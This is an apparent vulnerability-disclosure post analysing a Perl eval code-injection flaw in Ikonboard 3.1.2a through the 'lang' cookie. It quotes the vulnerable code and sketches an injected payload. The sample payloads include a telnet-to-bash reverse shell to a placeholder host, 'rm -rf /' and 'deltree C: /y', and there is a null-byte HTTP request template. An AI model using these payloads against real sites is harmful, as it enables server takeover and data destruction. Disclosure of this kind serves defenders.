Vender: Jarvis Entertainment Product: Ikonboard Version: 3.1.2a and Below (All current versions). On the topic of the recent post about Ikonboard and it's command execution vulnerabilities In # Make sure the cookie data is legal if ($iB::COOKIES->{$iB::INFO->{'COOKIE_ID'}.'lang'}) { $iB::COOKIES->{$iB::INFO->{'COOKIE_ID'}.'lang'} =~ s/^([\d\w]+)$/$1/; } $default = $iB::COOKIES->{$iB::INFO->{'COOKIE_ID'}.'lang'} || $iB::INFO->{'DEFAULT_LANGUAGE'} || 'en'; # Quick check to make sure the directory exists unless (-d $iB::INFO->{IKON_DIR}."Languages/$default") { $default = 'en'; } my $code = 'require '. "\"$default/" .$area. '.pm"; $lang ='. $area. '->new();'; eval $code; $obj->cgi_error("Could not access the language file: $@") if $@; return $lang; } -------------- The first bit is of course where the exploit actualy accures. Although we can in definitely define $default to our own value I scratched my head for a while trying to figure out how this could be exploited. After a few hours of staring i came to the final (and easy) conclusion that is this: If $default where to equal: where 'en' is the usualy default string contained in $default and UniversalWords is contained in $area and then the .pm etc. $default = "en/\"; <My code> ; ##" then the eval would simply interpret to the following: eval require "en/"; <My Code>; ##/" .$area. '.pm"; $lang = '. $area. '->new(). so what would happen is the eval would do the require on en/ then it would move on to execute whatever arbitrary perl code you placed in <My Code>. Such as a " `telnet bla.bla.bla.bla | /bin/bash | telnet bla.bla.bla.bla` " or worse (hopefully) an deltree C: /y or rm -rf /, seeing as Ikonboard can be ran on linux or windows. The meathod of injecting the code we wish into $default would be as simple as it is in the exploit for 3.1.1: GET $PATH HTTP/1.1 Host: $HOST Cookie: lang=%HEX$HEX%HEX%00 ## Followed by a Null Byte to bypass filters. Connection: close ------- As of this moment I have not written a working exploit and am not even 100% sure if this would work, seeing as the person who posted this vulnerability a day ago claimed he had a working example I decided to wait on this to see how it is done. --K-sPecial